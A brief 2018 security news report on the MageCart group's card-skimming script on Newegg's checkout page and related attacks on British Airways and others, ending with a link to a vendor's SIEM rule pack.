Delaware, USA – September 20, 2018 — It became known about the next victim of the MageCart cybercrime group conducting high profile skimming operations. Researchers from RiskIQ and Volexity discovered skimmer on the website of the California retailer Newegg that transferred customer payment cards data to attackers’ server. Earlier this month, researchers discovered same successful attacks on British Airways, the web push notifications service Feedify and broadcasting giant ABS-CBN. As in previously uncovered attacks, hackers from MageCart placed malicious code on the page that processes financial transactions, and from the middle of August until September 18, it had stolen the payment cards data. The number of victims is still unknown, but due to the popularity of Newegg, we can speak about the millions of customers of the company. In order not to cause suspicion, MageCart registered the domain ‘neweggstats.com’ and acquired SSL certificate issued for the domain by Comodo. Skimmer code is similar to that used in the attack on British Airways and consists of only 15 lines of script and it was capable to stole card data from both mobile and desktop customers.
The attacks reported this month show that the MageCart group targets websites of any organizations that process payments online. Adversaries attack large companies worldwide, and for each operation, they register a separate domain and optimize the script to steal data. At the moment it is not known how the attackers got access to the website. Judging by the intensity of attacks, the campaign gathers steam. To timely detect attempts to compromise site and inject malicious code, you can use your SIEM with Web Application Framework rule pack: https://my.socprime.com/en/integrations/web-application-security-framework-arcsight